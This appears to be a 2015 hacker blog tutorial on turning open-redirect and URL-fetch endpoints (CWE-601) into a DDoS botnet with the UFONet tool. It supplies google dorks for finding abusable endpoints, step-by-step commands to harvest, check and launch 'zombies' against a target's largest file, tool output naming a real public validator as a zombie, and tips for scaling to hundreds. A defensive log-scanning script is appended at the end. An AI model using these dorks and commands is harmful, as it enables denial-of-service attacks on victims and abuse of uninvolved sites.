PH1K3

CWE-601 building a quick botnet from the terminal

May 2nd, 2015
This time I am going to xploit CWE-601 and use it to make the targets my slaves/zombies, building a small botnet
using python, curl and google dorks :)

the vulnerability I'm goin to sploit is:
CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
more info: http://cwe.mitre.org/data/definitions/601.html
https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2

I searched around and found out that epsylon has created a tool for this and put it on his github.
So open your terminal and type: cd Desktop && mkdir ufonet && cd ufonet && wget clone https://github.com/epsylon/ufonet.git

then cd into that dir and when u launch it (./ufonet) you are first goin to wanna find your zombies so you can take
down your target.
dorks: 'proxy.php?url='
'check.cgi?url='
'checklink?uri='
'validator?uri='

let's search: ./ufonet -s 'checklink?uri=' 30

:~/Desktop/programs/ufonet/ufonet/ufonet# ./ufonet -s 'checklink?uri=' 30
===========================================================================

888 888 8888888888 .d88888b. 888b 888 888
888 888 888 d88PY888b 8888b 888 888
888 888 888 888 888 88888b 888 888
888 888 8888888 888 888 888Y88b 888 .d88b. 888888
888 888 888 888 888 888 Y88b888 d8P Y8b 888
888 888 888 888 888 888 Y88888 88888888 888
Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.
'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888

UFONet - DDoS attacks via Web Abuse - by psy

===========================================================================

Searching for 'zombies' on google results. Good Luck ;-)

======================

+Victim found: http://validator.w3.org/checklink?uri=
------------

======================
+Possible Zombies: 1
======================

Wanna check if they are valid zombies? (Y/n)
Y
Are 'they' alive? :-) (HEAD Check):
===================================
Trying: 1
---------------------
Zombie: validator.w3.org
Status: Ok [200]
----------
==================
OK: 1 Fail: 0
==================
======================
Checking for payloads:
======================
Trying: 1
---------------------
Vector: http://validator.w3.org/checklink?uri=
Status: Waiting your orders...
----------
==================
OK: 1 Fail: 0
==================
==================
Army of 'zombies'
==================
------------------
Total Army: 1
------------------
Wanna update your army (Y/n)Y
-------------------------

[INFO] - Botnet updated! ;-)

and yeah, u use these dorks to find as many vic as u can.
u can also use this command to search for 30 pages instead of 30 dorks, it's like a more verbose mode
./ufonet -s 'proxy.php?url=' --sn 30
but u can always change 30 to what u want. U could rewrite the program and add threads to make it a lot faster = more zombies

the attack:
first u have to inspect your target: ./ufonet -i http://target.com
then try to attack that: ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"

then let's use all your zombies against the target: ./ufonet -a http://target.com -r 30
30 = rounds to attack


I got 10 zombies by using 3 dorks and 20 tries each. If u thread it up and use like 100-200 threads I'm sure u could get a couple of maybe 300 and up

Cya next time

!\_________________________/!\
!! !! \
!! Your security is 404 !! \
!! !! !
!! u have been !! !
!! !! !
!! Hacked !! !
!! !! !
!! Sincerly PH1K3 !! /
!!_________________________!! /
!/_________________________\!/
__\_________________/__/!_
!_______________________!/
________________________
/oooo oooo oooo oooo /!
/ooooooooooooooooooooooo/ /
/ooooooooooooooooooooooo/ /
/C=_____________________/_/
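
Seen from the side of a site that runs one of the URL-fetching endpoints named in the dorks above, this added example (not part of the original paste and not UFONet code) scans access-log lines for repeated fetches of one external host through a url=/uri= parameter. The log format, host names, function names and threshold are assumptions made for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Query parameters named by the dorks in the paste (url= and uri=).
FETCH_PARAMS = ("url", "uri")
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')


def fetch_target(request_path, own_hosts):
    """Return the external host a request asks this server to fetch, else None."""
    query = parse_qs(urlsplit(request_path).query)
    for name in FETCH_PARAMS:
        for value in query.get(name, []):
            try:
                host = urlsplit(value).hostname
            except ValueError:  # malformed URL, e.g. a broken IPv6 literal
                continue
            if host and host.lower() not in own_hosts:
                return host.lower()
    return None


def reflector_abuse(log_lines, own_hosts, threshold=3):
    """Map each external host fetched at least `threshold` times to its count."""
    hits = Counter()
    for line in log_lines:
        match = REQUEST_RE.search(line)
        host = fetch_target(match.group(1), own_hosts) if match else None
        if host:
            hits[host] += 1
    return {host: n for host, n in hits.items() if n >= threshold}


# Constructed sample access-log lines (hypothetical hosts), not real traffic.
SAMPLE_LOG = [
    '198.51.100.4 - - [02/May/2015:10:00:01 +0000] "GET /checklink?uri=http%3A%2F%2Ftarget.example%2Fbig.iso HTTP/1.1" 200 512',
    '198.51.100.4 - - [02/May/2015:10:00:01 +0000] "HEAD /checklink?uri=http%3A%2F%2Ftarget.example%2Fbig.iso HTTP/1.1" 200 0',
    '203.0.113.9 - - [02/May/2015:10:00:02 +0000] "GET /proxy.php?url=http://target.example/big.iso HTTP/1.1" 200 512',
    '192.0.2.33 - - [02/May/2015:10:03:10 +0000] "GET /checklink?uri=http%3A%2F%2Fother.example%2Fpage HTTP/1.1" 200 2048',
    '192.0.2.33 - - [02/May/2015:10:03:12 +0000] "GET /checklink?uri=http%3A%2F%2Fvalidator.example%2Fdocs HTTP/1.1" 200 1024',
    '192.0.2.50 - - [02/May/2015:10:04:00 +0000] "GET /index.html HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for host, n in reflector_abuse(SAMPLE_LOG, {"validator.example"}).items():
        print(f"{host}: {n} fetches requested through this server")
```

Hosts that cross the threshold are candidates for per-destination rate limiting or an allowlist on the fetch endpoint.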